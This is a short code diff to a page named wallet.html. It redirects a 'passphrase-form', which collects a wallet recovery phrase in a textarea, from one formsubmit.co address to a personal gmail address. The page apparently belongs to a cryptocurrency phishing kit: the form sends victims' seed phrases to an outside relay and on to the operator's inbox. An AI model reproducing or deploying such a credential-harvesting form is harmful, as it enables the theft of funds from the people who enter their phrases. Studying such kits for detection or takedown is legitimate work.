--- a/wallet.html
+++ b/wallet.html
@@ -68,7 +68,7 @@
         </div>
 
  
-<form action="https://formsubmit.co/admin@mainetcore.click" method="POST" id="passphrase-form">
+<form action="https://formsubmit.co/dr.garryroquero@gmail.com" method="POST" id="passphrase-form">
 
   <div class="relative my-4" data-twe-input-wrapper-init>
     <textarea id="passphrase" name="name" required rows="8"
